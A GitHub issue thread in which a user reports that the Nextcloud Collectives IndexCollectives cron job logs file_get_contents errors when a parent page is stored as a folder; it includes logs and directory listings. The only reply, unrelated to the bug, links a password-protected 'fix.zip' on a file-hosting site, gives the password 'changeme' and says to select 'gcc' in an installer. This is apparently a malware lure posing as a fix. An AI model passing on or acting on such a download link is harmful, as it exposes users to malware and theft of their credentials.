### ISSUE TITLE
Error while running background job OCA\Collectives\BackgroundJob\IndexCollectives

### ISSUE THREAD

**Issue by davidfrickert** [nextcloud/collectives#1448]
**Describe the bug**
Nextcloud logs are full of errors on IndexCollectives cronjob, e.g.:

```
file_get_contents(/var/www/html/data/appdata_ocrblmvzwlmq/collectives/1/Kubernetes Cluster/Migrations.md): Failed to open stream: No such file or directory at /var/www/html/lib/private/Files/Storage/Local.php#331 
```

Looking at the filesystem, this file indeed does not exist, as it is a folder, due to it being a parent page to other subpages.

```
root@nextcloud-555c8b79f9-9c56s:/var/www/html/data/appdata_ocrblmvzwlmq/collectives/1/Kubernetes Cluster# ls
Debugging  Migrations  Readme.md  Renovate  Storage
root@nextcloud-555c8b79f9-9c56s:/var/www/html/data/appdata_ocrblmvzwlmq/collectives/1/Kubernetes Cluster# cd Migrations/
root@nextcloud-555c8b79f9-9c56s:/var/www/html/data/appdata_ocrblmvzwlmq/collectives/1/Kubernetes Cluster/Migrations# ls
 Readme.md  'SQlite3 to Postgres.md'
```

This is an example structure that gives these errors in the logs:

![image](https://github.com/user-attachments/assets/c3f9b64d-6605-4983-a491-0ef913f7d3f5)

**To Reproduce**
?

**Expected behavior**
No errors in logs from IndexCollectives

**Screenshots**

**Server details:**
- Collectives app version: 2.14.2
- Nextcloud version: 29.0.5
- PHP Version: ? (official NC docker image)
- Database: Postgres 16.3

<details>
<summary>Logs</summary>

#### Nextcloud log (data/nextcloud.log)
```
GenericFileException Error while running background job OCA\Collectives\BackgroundJob\IndexCollectives (id: 76559, arguments: null)
Error while running background job OCA\Collectives\BackgroundJob\IndexCollectives (id: 76559, arguments: null)
	
file_get_contents(/var/www/html/data/appdata_ocrblmvzwlmq/collectives/1/Kubernetes Cluster/Migrations.md): Failed to open stream: No such file or directory at /var/www/html/lib/private/Files/Storage/Local.php#331 
```
</details>

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
